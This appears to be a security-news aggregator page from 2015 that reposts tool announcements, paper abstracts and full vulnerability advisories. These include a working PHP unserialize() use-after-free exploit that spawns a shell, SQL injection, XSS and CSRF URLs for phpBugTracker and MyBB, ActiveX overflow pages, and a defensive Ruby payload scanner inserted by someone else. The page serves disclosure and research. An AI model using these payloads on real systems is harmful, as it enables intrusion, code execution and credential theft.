Channel: BOT24

Demonstrating ClickJacking with Jack

Jack is a tool I created to help build clickjacking PoCs. It uses basic HTML and JavaScript and can be found on GitHub. See more at: http://www.sensepost.com/blog/11105.html

Paper: Machine Learning Classification over Encrypted Data

Machine learning classification is used for numerous
tasks nowadays, such as medical or genomics predictions,
spam detection, face recognition, and financial predictions. Due
to privacy concerns, in some of these applications, it is important
that the data and the classifier remain confidential.

In this work, we construct three major classification protocols
that satisfy this privacy constraint: hyperplane decision, Naïve
Bayes, and decision trees. We also enable these protocols to be
combined with AdaBoost. At the basis of these constructions is
a new library of building blocks, which enables constructing a
wide range of privacy-preserving classifiers; we demonstrate how
this library can be used to construct other classifiers than the
three mentioned above, such as a multiplexer and a face detection
classifier.

We implemented and evaluated our library and our classifiers.
Our protocols are efficient, taking milliseconds to a few seconds
to perform a classification when running on real medical datasets.


more here.............http://www.internetsociety.org/sites/default/files/04_1_2.pdf

Type Confusion Infoleak Vulnerability in unserialize() with DateTimeZone

# Type Confusion Infoleak Vulnerability in unserialize() with DateTimeZone

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.1.29 - Release Date: 2015.2.20

> A Type Confusion Vulnerability was discovered in unserialize() with DateTimeZone object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.6
Affected is PHP 5.5 < 5.5.22
Affected is PHP 5.4 < 5.4.38

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------

```c
static int php_date_timezone_initialize_from_hash(zval **return_value, php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC)
{
        zval            **z_timezone = NULL;
        zval            **z_timezone_type = NULL;

        if (zend_hash_find(myht, "timezone_type", 14, (void**) &z_timezone_type) == SUCCESS) {
                if (zend_hash_find(myht, "timezone", 9, (void**) &z_timezone) == SUCCESS) {
                        convert_to_long(*z_timezone_type);
                        if (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone) TSRMLS_CC)) {
                                return SUCCESS;
                        }
                }
        }
        return FAILURE;
}
...
static int timezone_initialize(php_timezone_obj *tzobj, /*const*/ char *tz) /* {{{ */
{
        timelib_time *dummy_t = ecalloc(1, sizeof(timelib_time));
        int           dst, not_found;
        char         *orig_tz = tz;

        dummy_t->z = timelib_parse_zone(&tz, &dst, dummy_t, &not_found, DATE_TIMEZONEDB, php_date_parse_tzfile_wrapper);
        if (not_found) {
                php_error_docref(NULL, E_WARNING, "Unknown or bad timezone (%s)", orig_tz);
```

The Z_STRVAL_PP macro is applied to the timezone value without any check
that it is a string, so it leads to looking up an arbitrary valid memory
address and outputting, via a warning-level error message, the string that
starts at that address.

Proof of Concept Exploit
------------
The PoC works on a standard Mac OS X 10.10.2 installation of PHP 5.5.14.

```php
<?php

$data = unserialize('O:12:"DateTimeZone":2:{s:13:"timezone_type";i:1;s:8:"timezone";i:4298494896;}');

?>
```

Running the PoC on the command line shows the warning-level error message:

```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run test/test.php
Process 889 launched: '/usr/bin/php' (x86_64)

Warning: DateTimeZone::__wakeup(): Unknown or bad timezone
(UH??AWAVAUATSH??8) in /test/test.php on line 3
Process 889 exited with status = 0 (0x00000000)
```

Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]

# Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.1.29 - Release Date: 2015.2.20

> A use-after-free vulnerability was discovered in unserialize() with DateTime/DateTimeZone/DateInterval/DatePeriod objects' __wakeup() magic method that can be abused for leaking arbitrary memory blocks or executing arbitrary code remotely.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.6
Affected is PHP 5.5 < 5.5.22
Affected is PHP 5.4 < 5.4.38

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------

```c
static int php_date_initialize_from_hash(php_date_obj **dateobj, HashTable *myht)
{
        zval             *z_date;
        zval             *z_timezone;
        zval             *z_timezone_type;
        zval              tmp_obj;
        timelib_tzinfo   *tzi;
        php_timezone_obj *tzobj;

        z_date = zend_hash_str_find(myht, "date", sizeof("data")-1);
        if (z_date) {
                convert_to_string(z_date);
                z_timezone_type = zend_hash_str_find(myht, "timezone_type", sizeof("timezone_type")-1);
                if (z_timezone_type) {
                        convert_to_long(z_timezone_type);
                        z_timezone = zend_hash_str_find(myht, "timezone", sizeof("timezone")-1);
                        if (z_timezone) {
                                convert_to_string(z_timezone);

...

static int php_date_timezone_initialize_from_hash(zval **return_value, php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC)
{
        zval            **z_timezone = NULL;
        zval            **z_timezone_type = NULL;

        if (zend_hash_find(myht, "timezone_type", 14, (void**) &z_timezone_type) == SUCCESS) {
                if (zend_hash_find(myht, "timezone", 9, (void**) &z_timezone) == SUCCESS) {
                        convert_to_long(*z_timezone_type);
                        if (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone) TSRMLS_CC)) {
                                return SUCCESS;
                        }
                }
        }
        return FAILURE;
}
```

The convert_to_long() call frees the zval and all of its children from
memory. However, the unserialize() code still allows R: or r: entries to set
references to that already-freed memory. This is a use-after-free
vulnerability, and it allows arbitrary code execution.
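Added here as an example (not code from either advisory or from PHP): a Ruby pre-check a defender can run over untrusted serialized input before it reaches unserialize(), covering both the wrong-typed DateTimeZone property from the previous advisory and the R:/r: back-reference into a DateTime* object described above. PhpSerializedScanner, its finding names and the sample payloads are constructed for this example; the slot numbering follows PHP's var_hash behaviour (an R: entry takes no slot of its own, an r: entry does).

```ruby
require 'strscan'

# Structural pre-check for PHP serialize() payloads, run before untrusted data
# reaches unserialize(). It flags the two shapes the DateTime* advisories rely
# on: a DateTime* property of the wrong type, and an R:/r: back-reference into a
# DateTime* object's properties. Covers the format subset the PoCs use.
class PhpSerializedScanner
  DATE_CLASSES = %w[DateTime DateTimeZone DateInterval DatePeriod].freeze
  Finding = Struct.new(:kind, :detail)
  # Constructed samples: the page's infoleak payload, and the UAF PoC's structure
  # with a harmless placeholder string in place of the fake zval bytes.
  SAMPLES = {
    infoleak:  'O:12:"DateTimeZone":2:{s:13:"timezone_type";i:1;s:8:"timezone";i:4298494896;}',
    uaf_shape: 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}' \
               's:8:"timezone";s:3:"UTC";}i:1;s:5:"dummy";i:2;a:1:{i:0;R:4;}}'
  }.freeze

  def initialize(payload)
    @ss = StringScanner.new(payload.b) # s: lengths count bytes, so scan bytes
    @findings = []
    @slot = 0        # unserialize() numbers every value; R:/r: refer to those numbers
    @date_slots = {} # slot => DateTime* class whose property (or nested value) it is
  end

  # Returns the Finding list (empty when the payload looks sane); raises on bad syntax.
  def scan
    parse_value(nil)
    raise 'trailing data after serialized value' unless @ss.eos?
    @findings
  end

  private

  # Scans `re` at the cursor or raises; returns the first capture, else the match.
  def take(re)
    @ss.scan(re) || raise("parse error at byte #{@ss.pos}: expected #{re.inspect}")
    @ss[1] || @ss.matched
  end

  # Reads <len>:"<bytes>" (shared by strings, string keys and class names).
  def string_body
    len = take(/(\d+):"/).to_i
    bytes = @ss.peek(len)
    raise "truncated string at byte #{@ss.pos}" if bytes.bytesize < len
    @ss.pos += len
    take(/"/)
    bytes.force_encoding(Encoding::UTF_8)
  end

  # Keys are not numbered slots, mirroring PHP's own unserializer.
  def parse_key
    case @ss.getch
    when 'i' then take(/:(-?\d+);/).to_i
    when 's' then take(/:/); key = string_body; take(/;/); key
    else raise "unsupported key type at byte #{@ss.pos}"
    end
  end

  # Parses {key;value ...} for arrays and objects; returns key => [type, value].
  def parse_pairs(count, owner)
    take(/\{/)
    props = {}
    count.times { props[parse_key] = parse_value(owner) }
    take(/\}/)
    props
  end

  # Parses one value, returns [type, value]; `owner` is the enclosing DateTime* class or nil.
  def parse_value(owner)
    type = @ss.getch || raise('unexpected end of data')
    unless type == 'R' # an R: entry occupies no slot of its own; r: does
      @slot += 1
      @date_slots[@slot] = owner if owner
    end
    case type
    when 'i' then [:int, take(/:(-?\d+);/).to_i]
    when 's' then take(/:/); val = string_body; take(/;/); [:string, val]
    when 'a' then [:array, parse_pairs(take(/:(\d+):/).to_i, owner)]
    when 'O' then parse_object(owner)
    when 'R', 'r'
      target = take(/:(\d+);/).to_i
      if (cls = @date_slots[target])
        @findings << Finding.new(:ref_into_date_object, "#{type}:#{target} points at a value owned by #{cls}")
      end
      [:ref, target]
    else raise "unsupported type #{type.inspect} at byte #{@ss.pos}"
    end
  end

  def parse_object(owner)
    take(/:/)
    cls = string_body
    props = parse_pairs(take(/:(\d+):/).to_i, DATE_CLASSES.include?(cls) ? cls : owner)
    check_date_props(cls, props) if DATE_CLASSES.include?(cls)
    [:object, cls]
  end

  # __wakeup() assumes timezone_type is an int and timezone a string; anything
  # else is the type confusion the first advisory describes.
  def check_date_props(cls, props)
    { 'timezone_type' => :int, 'timezone' => :string }.each do |name, want|
      got = props[name]
      next if got.nil? || got[0] == want
      @findings << Finding.new(:type_confusion, "#{cls}.#{name} is #{got[0]}, expected #{want}")
    end
  end
end
```

Run with `PhpSerializedScanner.new(payload).scan`; a non-empty result (or a parse error) is reason to reject the input rather than call unserialize() on it.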

Proof of Concept Exploit
------------
The PoC works on a standard Mac OS X 10.10.2 installation of PHP 5.5.14.

```php
<?php

$f = $argv[1];
$c = $argv[2];

$fakezval1 = ptr2str(0x100b83008);
$fakezval1 .= ptr2str(0x8);
$fakezval1 .= "\x00\x00\x00\x00";
$fakezval1 .= "\x06";
$fakezval1 .= "\x00";
$fakezval1 .= "\x00\x00";

$data1 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}';

$x = unserialize($data1);
$y = $x[2];

// zend_eval_string()'s address
$y[0][0] = "\x6d";
$y[0][1] = "\x1e";
$y[0][2] = "\x35";
$y[0][3] = "\x00";
$y[0][4] = "\x01";
$y[0][5] = "\x00";
$y[0][6] = "\x00";
$y[0][7] = "\x00";

$fakezval2 = ptr2str(0x3b296324286624); // $f($c);
$fakezval2 .= ptr2str(0x100b83000);
$fakezval2 .= "\x00\x00\x00\x00";
$fakezval2 .= "\x05";
$fakezval2 .= "\x00";
$fakezval2 .= "\x00\x00";

$data2 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;R:4;}s:8:"timezone";s:3:"UTC";}}';

$z = unserialize($data2);

function ptr2str($ptr)
{
        $out = "";
        for ($i=0; $i<8; $i++) {
                $out .= chr($ptr & 0xff);
                $ptr >>= 8;
        }
        return $out;
}

?>
```

Running the PoC on the command line, any PHP code can be executed:

```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)"
Process 13472 launched: '/usr/bin/php' (x86_64)
sh: no job control in this shell
sh-3.2$ php -v
PHP 5.5.14 (cli) (built: Sep  9 2014 19:09:25)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
sh-3.2$ exit
exit
Process 13472 exited with status = 0 (0x00000000)
(lldb)
```

Komodia rootkit findings by @TheWack0lian

First off: this is the first time I "seriously" reversed a kernel-mode NT driver, so keep that in mind when you read this here.........https://gist.github.com/Wack0/f865ef369eb8c23ee028

and more on Komodia here.........https://blog.filippo.io/komodia-superfish-ssl-validation-is-broken/

Multiple SQLi-, stored/reflected XSS- and CSRF-vulnerabilities in phpBugTracker v. 1.6.0

Advisory: Multiple SQLi, stored/reflected XSS- and CSRF-vulnerabilities in phpBugTracker v.1.6.0
Advisory ID: SROEADV-2015-16
Author: Steffen Rösemann
Affected Software: phpBugTracker v.1.6.0
Vendor URL: https://github.com/a-v-k/phpBugTracker
Vendor Status: patched
CVE-ID: will be asked to be assigned after release on FullDisclosure via the OSS list
Tested on: OS X 10.10 with Firefox 35.0.1 ; Kali Linux 3.18, Iceweasel 31

==========================
Vulnerability Description:
==========================

The issue tracker phpBugTracker v. 1.6.0 suffers from multiple SQLi-,
stored/reflected XSS- and CSRF-vulnerabilities.

==================
Technical Details:
==================

The following files used in a common phpBugTracker installation suffer from
different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities:

===========
project.php
===========

SQL injection / underlying CSRF vulnerability in project.php via id
parameter:

http://{TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+

Stored XSS via input field "project name":

http://{TARGET}/admin/project.php?op=add

executed in: e.g. http://{TARGET}/admin/project.php, http://{TARGET}/index.php


========
user.php
========

Reflected XSS in user.php via use_js parameter:

http://{TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1

executed in: same page


=========
group.php
=========

Reflected XSS in group.php via use_js parameter:

http://{TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1

executed in: same page

(Blind) SQL injection / underlying CSRF vulnerability in group.php via
group_id parameter (used in different operations):

http://{TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+
http://{TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+


==========
status.php
==========

SQL injection / underlying CSRF vulnerability in status.php via status_id
parameter:

http://{TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

Stored XSS via input field "Description":

http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0

executed in: e.g. http://{TARGET}/admin/status.php

CSRF vulnerability in status.php (delete statuses):

<img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}">


==============
resolution.php
==============

SQL injection / underlying CSRF vulnerability in resolution.php via
resolution_id parameter:

http://{TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+

CSRF vulnerability in resolution.php (delete resolutions):

<img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}">


============
severity.php
============

SQL injection / underlying CSRF vulnerability in severity.php via
severity_id parameter:

http://{TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

CSRF vulnerability in severity.php (delete severities):

<img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}">

Stored XSS in severity.php via input field "Description":

http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0

executed in: e.g. http://{TARGET}/admin/severity.php


============
priority.php
============

SQL injection / underlying CSRF vulnerability in priority.php via
priority_id parameter:

http://{TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+


======
os.php
======

SQL injection / underlying CSRF vulnerability in os.php via os_id
parameter:

http://{TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+

CSRF vulnerability in os.php (delete operating systems):

<img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}" >

Stored XSS vulnerability in os.php via input field "Regex":

http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0

executed in: e.g. http://{TARGET}/admin/os.php?


============
database.php
============

SQL injection / underlying CSRF vulnerability in database.php via
database_id parameter:

http://{TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+

CSRF vulnerability in database.php (delete databases):

<img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}">

Stored XSS vulnerability in database.php via input field "Name":

http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0


========
site.php
========

CSRF vulnerability in site.php (delete sites):

<img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}" >

SQL injection / underlying CSRF vulnerability in site.php via site_id
parameter:

http://{TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+


=======
bug.php
=======

This issue has already been assigned CVE-2004-1519, but seems not to have
been corrected since the assignment:

SQL injection / underlying CSRF vulnerability in bug.php via project
parameter:

http://{TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+

For details see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519.



=========
Solution:
=========

Update to version 1.7.0.


====================
Disclosure Timeline:
====================
03/05-Feb-2015 – found the vulnerabilities
05-Feb-2015 - informed the developers (see [3])
05-Feb-2015 – release date of this security advisory [without technical
details]
05-Feb-2015 - forked the Github repository, to keep it available for other
security researchers (see [4])
05/06-Feb-2015 - vendor replied, will provide a patch for the
vulnerabilities
09-Feb-2015 - vendor provided a patch (version 1.7.0, see [3]); technical
details will be released on 19th February 2015
19-Feb-2015 - release date of this security advisory
19-Feb-2015 - sent to FullDisclosure


========
Credits:
========

Vulnerabilities found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] https://github.com/a-v-k/phpBugTracker
[2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html
[3] https://github.com/a-v-k/phpBugTracker/issues/4
[4] https://github.com/sroesemann/phpBugTracker

Multiple stored XSS-vulnerabilities in MyBB v. 1.8.3

Advisory: Stored XSS-Vulnerabilities in MyBB v. 1.8.3
Advisory ID: SROEADV-2015-15
Author: Steffen Rösemann
Affected Software: MyBB v. 1.8.3
Vendor URL: http://www.mybb.com
Vendor Status: patched
CVE-ID: -

==========================
Vulnerability Description:
==========================

MyBB v. 1.8.3 suffers from multiple stored XSS-vulnerabilities in the
administrative backend.

==================
Technical Details:
==================

The stored XSS-vulnerabilities can be found in different modules in the
following locations of a common MyBB installation:

======================
Module "config-attachment_types"
======================

via form-field MIME-type:

http://{TARGET}/admin/index.php?module=config-attachment_types&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=config-attachment_types

===============
Module "config-mycode"
===============

via form fields "title" and "short description":

http://{TARGET}/admin/index.php?module=config-mycode&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=config-mycode

===================
Module "forum-management"
===================

via form field "title":

http://{TARGET}/admin/index.php?module=forum-management&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=forum

==============
Module "user-groups"
==============

via form fields "title" and/or "short description":

http://{TARGET}/admin/index.php?module=user-groups&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=user-groups

================
Module "style-templates"
================

via form field "name":

http://{TARGET}/admin/index.php?module=style-templates&action=add_set

executed in: e.g. http://{TARGET}/admin/index.php?module=style-templates

====================================
Module "style-templates" in action "add_template_group"
====================================

via form field "title":

http://{TARGET}/admin/index.php?module=style-templates&action=add_template_group

executed in: e.g. http://{TARGET}/admin/index.php?module=style-templates&sid={TEMPLATES_NUMERIC_ID}

=============
Module "tool-tasks"
=============

via form field "title":

http://{TARGET}/admin/index.php?module=tools-tasks&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog

=================
Module "config-post_icons"
=================

via form field "name":

http://{TARGET}/admin/index.php?module=config-post_icons&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog

=============
Module "user-titles"
=============

via form field "title to assign":

http://{TARGET}/admin/index.php?module=user-titles&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog

================
Module "config-banning"
================

via form field "username":

http://{TARGET}/admin/index.php?module=config-banning&type=usernames

executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog

=========
Solution:
=========

Upgrade to v. 1.8.4.


====================
Disclosure Timeline:
====================
02/03-Feb-2015 – found the vulnerabilities
03-Feb-2015 - informed the developers according to their security issue
rules (see [3])
03-Feb-2015 – release date of this security advisory [without technical
details]
03-Feb-2015 - vendor replied, issues will be patched
15-Feb-2015 - vendor released patch v. 1.8.4 (see [4])
19-Feb-2015 - release date of this security advisory
19-Feb-2015 - sent to FullDisclosure

========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://www.mybb.com
[2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-15.html
[3] http://www.mybb.com/get-involved/security/
[4] http://blog.mybb.com/2015/02/15/mybb-1-8-4-released-feature-update-security-maintenance-release/

Samsung iPolis XnsSdkDeviceIpInstaller.ocx ActiveX Remote Code Execution Vulnerabilities

CVE-2015-0555

Introduction
*************************************************************

There is a buffer overflow vulnerability which leads to remote code
execution. The vulnerability is due to improper input validation in the
ReadConfigValue and WriteConfigValue APIs of XnsSdkDeviceIpInstaller.ocx.

This is different from CVE-2014-3911, as this affects iPolis version 1.12.2
(latest as of 12/12/2014); CVE-2014-3911 relates to a different ActiveX
control and an older iPolis version.

Discovery Method: Fuzzing
Exploitation: It is a client-side attack where an attacker can host a crafted
HTML web page with a malicious payload and entice the victim to browse to the
hosted page to compromise the victim.

Operating System: Windows 7 Ultimate N SP1

*************************************************************
Vulnerability1:
Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_ReadConfigValue_RemoteCodeExecution
*******************Proof of Concept (PoC)*********************
<html>
<head> Samsung iPolis 1.12.x XnsSdkDeviceIpInstaller.ocx ReadConfigValue()
Remote Code Execution</head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype  = "Function ReadConfigValue ( ByVal szKey As String ) As String"
memberName = "ReadConfigValue"
progid     = "XNSSDKDEVICELib.XnsSdkDevice"
argCount   = 1

arg1=String(1044, "A")

target.ReadConfigValue arg1

</script>
</html>


*****************************************************************************************
Vulnerability2:
Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_WriteConfigValue_RemoteCodeExecution

*******************Proof of Concept (PoC)*********************

<html>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype  = "Function WriteConfigValue ( ByVal szKey As String ,  ByVal szValue As String ) As Long"
memberName = "WriteConfigValue"
progid     = "XNSSDKDEVICELib.XnsSdkDevice"
argCount   = 2

arg1=String(14356, "A")
arg2="defaultV"

target.WriteConfigValue arg1 ,arg2

</script>
</html>
****************************************************************************

CERT contacted Samsung but there wasn't any response from Samsung.
Refer to http://blog.disects.com for more details.

Authored by Praveen Darshanam

x86obf code virtualizer released for free

x86obf is a tool for executable binary protection. It works by locating marked blocks of code and converting them to a series of instructions understood only by a randomly generated virtual machine, in order to make reverse engineering harder.

more here.......http://chaplja.blogspot.com/2015/02/x86obf-code-virtualizer-released-for.html

Exploiting the Superfish certificate

As discussed in my previous blog post, it took about 3 hours to reverse engineer the Lenovo/Superfish certificate and crack the password. In this blog post, I described how I used that certificate in order to pwn victims using a rogue WiFi hotspot. This also took me about three hours.

more here..........http://blog.erratasec.com/2015/02/exploiting-superfish-certificate.html#.VOiYBfnF-So

It All Swings Round-- Malicious Macros

I was recently intrigued by a TrendMicro blog talking about VAWTRAK malware. Baddies are going way back to using some old-school methods of infection. Heck, I used a malicious macro embedded in a Word Document on a social engineering engagement back at my first job.

So I wanted to look at some of these new macros and see what they are doing (and how they are doing it).

more here............http://sketchymoose.blogspot.com/2015/02/it-all-swings-round-malicious-macros.html

Paper: PowerSpy: Location Tracking using Mobile Device Power Analysis

Abstract—Modern mobile platforms like Android enable applications
to read aggregate power usage on the phone. This
information is considered harmless and reading it requires no
user permission or notification. We show that by simply reading
the phone’s aggregate power consumption over a period of a few
minutes an application can learn information about the user’s
location. Aggregate phone power consumption data is extremely
noisy due to the multitude of components and applications
simultaneously consuming power. Nevertheless, we show that by
using machine learning techniques, the phone’s location can be
inferred. We discuss several ways in which this privacy leak can
be remedied.


more here........http://arxiv.org/pdf/1502.03182v1.pdf

Bowcaster Feature: multipart/form-data

Need to reverse engineer or exploit a file upload vulnerability in an embedded web server? I added a multipart/form-data class to Bowcaster to help with that.

more here...........http://shadow-file.blogspot.com/2015/02/bowcaster-feature-multipartform-data.html

xaviershay-dm-rails v0.10.3.8 mysql credential exposure

Title: xaviershay-dm-rails v0.10.3.8 mysql credential exposure
Author: Larry W. Cashdollar, @_larry0
Date: 2015-02-17
Download Site: https://rubygems.org/gems/xaviershay-dm-rails
Vendor: Martin Gamsjaeger, Dan Kubb
Vendor Notified: 2015-02-17
Vendor Contact: notreal [at] rhnh.net
Description: This gem provides the railtie that allows datamapper to hook into rails3 and thus behave like a rails framework component. Just like activerecord does in rails, dm-rails uses the railtie API to hook into rails. The two are actually hooked into rails almost identically.
Vulnerability:
The problem is with the execute function exposing the user credentials to the process table.

Lines 169 - 177 in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb:

   def execute(statement)
     system(
       'mysql',
       (username.blank? ? '' : "--user=#{username}"),
       (password.blank? ? '' : "--password=#{password}"),
       '-e',
       statement
     )
   end

OSVDB: 118579
Exploit Code:
   $ while (true) do ps -ef | grep [p]assword; done
Advisory: http://www.vapid.dhs.org/advisory.php?v=115

Paper: Evaluation of Security Solutions for Android Systems

With the increasing usage of smartphones a plethora of security
solutions are being designed and developed. Many of the security
solutions fail to cope with advanced attacks and are not always
properly designed for smartphone platforms. Therefore, there is a
need for a methodology to evaluate their effectiveness. Since the
Android operating system has the highest market share today, we
decided to focus on it in this study in which we review some of
the state-of-the-art security solutions for Android-based
smartphones. In addition, we present a set of evaluation criteria
aiming at evaluating security mechanisms that are specifically
designed for Android-based smartphones. We believe that the
proposed framework will help security solution designers develop
more effective solutions and assist security experts evaluate the
effectiveness of security solutions for Android-based
smartphones.

more here...........http://arxiv.org/ftp/arxiv/papers/1502/1502.04870.pdf

Automating DFIR (Digital Forensics and Incident Response) - How to series on programming libtsk with python Part 1, 2 and 3

As you can see from the title of this post I'm starting on a series all about automating your workflow when doing DFIR work. It is my belief that our industry as we know it is poised for change due to the work of a few, but mostly in my opinion Joachim Metz. For all the time that I've done DFIR work the biggest lock-in that commercial software had that everyone else did not was the ability to work directly against a forensic image. We would always have to resort to using some commercial tool (whether free, semi free or paid for) to get access to the underlying data within a forensic image or a live running system to get at the data we wanted. With the large set of free and open source libraries now available you can write simple code to automate most of the work you were doing within these forensic tools and have the ability to customize that to your actual need.

more here of part 1......http://hackingexposedcomputerforensicsblog.blogspot.com/2015/02/automating-dfir-how-to-series-on.html

part 2.......http://hackingexposedcomputerforensicsblog.blogspot.com/2015/02/automating-dfir-how-to-series-on_19.html

part 3......http://hackingexposedcomputerforensicsblog.blogspot.com/2015/02/automating-dfir-how-to-series-on_21.html

Paper: Bitcoin over Tor isn’t a good idea

Abstract—Bitcoin is a decentralized P2P digital currency
in which coins are generated by a distributed set of miners
and transactions are broadcast via a peer-to-peer network.
While Bitcoin provides some level of anonymity (or rather
pseudonymity) by encouraging the users to have any number
of random-looking Bitcoin addresses, recent research shows that
this level of anonymity is rather low. This encourages users to
connect to the Bitcoin network through anonymizers like Tor and
motivates development of default Tor functionality for popular
mobile SPV clients. In this paper we show that combining Tor and
Bitcoin creates an attack vector for the deterministic and stealthy
man-in-the-middle attacks. A low-resource attacker can gain full
control of information flows between all users who chose to use
Bitcoin over Tor. In particular the attacker can link together
user’s transactions regardless of pseudonyms used, control which
Bitcoin blocks and transactions are relayed to the user and can
delay or discard user’s transactions and blocks. In collusion with
a powerful miner double-spending attacks become possible and
a totally virtual Bitcoin reality can be created for such set of
users. Moreover, we show how an attacker can fingerprint users
and then recognize them and learn their IP address when they
decide to connect to the Bitcoin network directly.

more here.............http://arxiv.org/pdf/1410.6079v2.pdf

proxenet

proxenet is a Write-Your-Own-Plugins multi-threaded web proxy for pentesters designed to allow you to use your favorite scripting language (Python, Lua, Ruby, etc.) to perform targeted attacks on HTTP applications.

more here...........https://github.com/hugsy/proxenet

universal copy/paste in linux

I’d like to use the same copy/paste keyboard bindings in every application on linux. I spent some time determining if such is possible (spoiler, at best it’s hacky).

more here..........http://burrows.svbtle.com/universal-copy-paste-in-linux

Hex-Rays Decompiler Enhanced View (HRDEV)

This is a simple IDA Pro Python plugin to make Hex-Rays Decompiler output a bit more attractive. The HRDEV plugin retrieves the standard decompiler output, parses it with the Python Clang bindings, does some magic, and puts it back.

more here.......https://github.com/ax330d/hrdev